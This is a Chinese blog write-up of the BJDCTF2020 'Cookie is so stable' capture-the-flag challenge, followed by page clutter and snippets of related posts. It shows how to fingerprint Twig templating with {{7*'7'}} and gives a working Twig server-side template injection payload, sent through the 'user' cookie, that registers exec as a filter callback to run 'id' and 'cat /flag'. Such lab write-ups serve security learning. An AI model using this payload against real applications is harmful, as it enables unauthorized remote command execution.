【BUUCTF】[BJDCTF2020]Cookie is so stable

最新推荐文章于 2023-04-03 20:01:35 发布
最新推荐文章于 2023-04-03 20:01:35 发布
阅读量225 收藏 1
点赞数 1
分类专栏: 模板注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124513904
版权

在这里插入图片描述
flag页面比较容易看出来存在SSTI
看见有wp说是Twig模板注入,copy一下判断方法

尝试{{7*7}}, 返回49

尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板

不同的模板的攻击方式不同,贴一个好文章
一篇文章带你理解漏洞之 SSTI 漏洞
用PL

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}

但是在输入框输入会被过滤,还有hint没有用,在hint页面的源码里面可以看到提示
在这里插入图片描述
在这里插入图片描述
构造cookie中的user

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述

aoao今晚吃什么
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1675
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 690
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3237
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
获取cookie非常好用的google插件
06-10
标题中的“获取cookie非常好用的google插件”指的是在Google Chrome浏览器上的一种扩展程序,它允许用户方便地管理和操作浏览器中的Cookie数据。Cookie是网站在用户计算机上存储的小型文本文件,用于跟踪用户偏好、...
JD cookie一键获取脚本,基于JavaScript
04-24
jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本...
java操作cookie示例(删除cookie)
09-04
在Java Web开发中,Cookie是一种常用的技术,用于在客户端存储和传递少量信息。本文将详细介绍如何使用Java操作Cookie,特别是如何设置、读取和删除Cookie。 首先,我们来看如何**设置Cookie**。在Java中,我们通常...
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)
姜小孩的博客
03-31 1701
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 187
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2488
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
Uncaught ReferenceError: cookie is not defined
最新发布
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值